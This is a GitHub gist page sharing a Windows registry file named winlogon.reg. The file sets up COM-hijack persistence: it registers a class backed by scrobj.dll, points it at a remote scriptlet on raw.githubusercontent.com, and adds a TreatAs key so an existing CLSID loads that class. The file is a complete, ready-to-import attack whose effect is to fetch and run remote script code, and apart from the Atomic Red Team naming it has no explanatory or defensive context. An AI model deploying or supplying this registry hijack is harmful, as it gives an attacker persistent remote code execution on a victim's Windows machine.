Skip to content

Instantly share code, notes, and snippets.

@hackmiss
Forked from anonymous/winlogon.reg
Created February 17, 2018 00:26
Show Gist options
  • Save hackmiss/ff1902063ac1a54fd546e61d73f31c4a to your computer and use it in GitHub Desktop.
Save hackmiss/ff1902063ac1a54fd546e61d73f31c4a to your computer and use it in GitHub Desktop.

Revisions

  1. @invalid-email-address Anonymous created this gist Feb 11, 2018.
    23 changes: 23 additions & 0 deletions winlogon.reg
    Original file line number Diff line number Diff line change
    @@ -0,0 +1,23 @@
    Windows Registry Editor Version 5.00
    [HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam.1.00]
    @="AtomicRedTeam"
    [HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam.1.00\CLSID]
    @="{00000001-0000-0000-0000-0000FEEDACDC}"
    [HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam]
    @="AtomicRedTeam"
    [HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam\CLSID]
    @="{00000001-0000-0000-0000-0000FEEDACDC}"
    [HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}]
    @="AtomicRedTeam"
    [HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\InprocServer32]
    @="C:\\WINDOWS\\system32\\scrobj.dll"
    "ThreadingModel"="Apartment"
    [HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\ProgID]
    @="AtomicRedTeam.1.00"
    [HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\ScriptletURL]
    @="https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/COMHijackScripts/AtomicRedTeam.sct"
    [HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\VersionIndependentProgID]
    @="AtomicRedTeam"
    [HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{06DA0625-9701-43DA-BFD7-FBEEA2180A1E}]
    [HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{06DA0625-9701-43DA-BFD7-FBEEA2180A1E}\TreatAs]
    @="{00000001-0000-0000-0000-0000FEEDACDC}"